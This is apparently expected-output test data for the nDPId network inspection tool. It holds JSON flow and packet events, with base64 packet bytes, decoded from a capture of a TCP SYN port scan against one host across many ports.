-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1733,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1733,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1723,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsbq4AADkGoMSsEAAIQA2GNIzTH5PdU4MZAAAAAGACCAAQ+QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1734,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1734,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1724,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAs2EwAACoGRiasEAAIQA2GNIzTCBTdU4MZAAAAAGACDAAkeAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1735,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1735,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1725,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsPR8AADoG0VOsEAAIQA2GNIzTBEbdU4MZAAAAAGACDAAoRgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1736,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1736,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1726,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsfjwAADAGmjasEAAIQA2GNIzTD83dU4MZAAAAAGACBAAkvwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1737,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1737,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1727,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAs8dMAADoGHJ+sEAAIQA2GNIzTI4vdU4MZAAAAAGACDAAJAQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1738,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56738,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1738,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1728,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsObwAAC8G37asEAAIQA2GNIzT3aLdU4MZAAAAAGACEABK6QAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1739,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061007,"flow_last_seen":1278275061007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061007,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1739,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1729,"flow_packet_id":1,"flow_last_seen":1278275061007,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061007,"pkt":"ACYLMQczACWzv5HuCABFAAAsqHsAACkGdvesEAAIQA2GNIzTgAndU4MZAAAAAGACCACwggAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1740,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061008,"flow_last_seen":1278275061008,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061008,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":787,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1740,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1730,"flow_packet_id":1,"flow_last_seen":1278275061008,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061008,"pkt":"ACYLMQczACWzv5HuCABFAAAsLtsAADoG35esEAAIQA2GNIzTAxPdU4MZAAAAAGACDAApeQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1741,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1741,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1731,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAsUJAAACUG0uKsEAAIQA2GNIzTI5fdU4MZAAAAAGACCAAM9QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1742,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1742,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1732,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAsmLwAAC0GgrasEAAIQA2GNIzTAiDdU4MZAAAAAGACCAAubAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1743,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1743,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1733,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAsaTkAADMGrDmsEAAIQA2GNIzTIL\/dU4MZAAAAAGACEAAHzQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1744,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1744,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1734,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/QMAADYGFW+sEAAIQA2GNIzSw1DdUoMYAAAAAGACDABpPgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1745,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1745,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1735,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAsj3AAADkGgAKsEAAIQA2GNIzSF\/HdUoMYAAAAAGACCAAYngAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1746,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3351,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1746,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1736,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAsPl0AADAG2hWsEAAIQA2GNIzSDRfdUoMYAAAAAGACBAAneAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1747,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1747,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1737,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAs24AAAC0GP\/KsEAAIQA2GNIzSzlbdUoMYAAAAAGACCABiOAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1748,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1748,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1738,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAs6Y8AACcGN+OsEAAIQA2GNIzSPpLdUoMYAAAAAGACEADp\/AAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1749,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49167,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1749,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1739,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsLOEAACsG8JGsEAAIQA2GNIzSwA\/dUoMYAAAAAGACEABofwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1750,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6789,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1750,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1740,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsboUAADIGp+2sEAAIQA2GNIzSGoXdUoMYAAAAAGACDAASCgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1751,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1751,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1741,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsVxkAACcGylmsEAAIQA2GNIzSF3TdUoMYAAAAAGACEAARGwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1752,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1057,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1752,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1742,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsbJ8AADoGodOsEAAIQA2GNIzSBCHdUoMYAAAAAGACDAAobgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1753,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1753,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1743,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsE7MAACUGD8CsEAAIQA2GNIzSD0rdUoMYAAAAAGACCAAhRQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1744,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAszqgAACUGVMqsEAAIQA2GNIzS\/23dUoMYAAAAAGACCAAxIQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1745,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsjYwAACsGj+asEAAIQA2GNIzSGWbdUoMYAAAAAGACEAAPKQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1756,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1756,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1746,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAse1IAADMGmiCsEAAIQA2GNIzSQmHdUoMYAAAAAGACEADmLQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1757,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1149,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 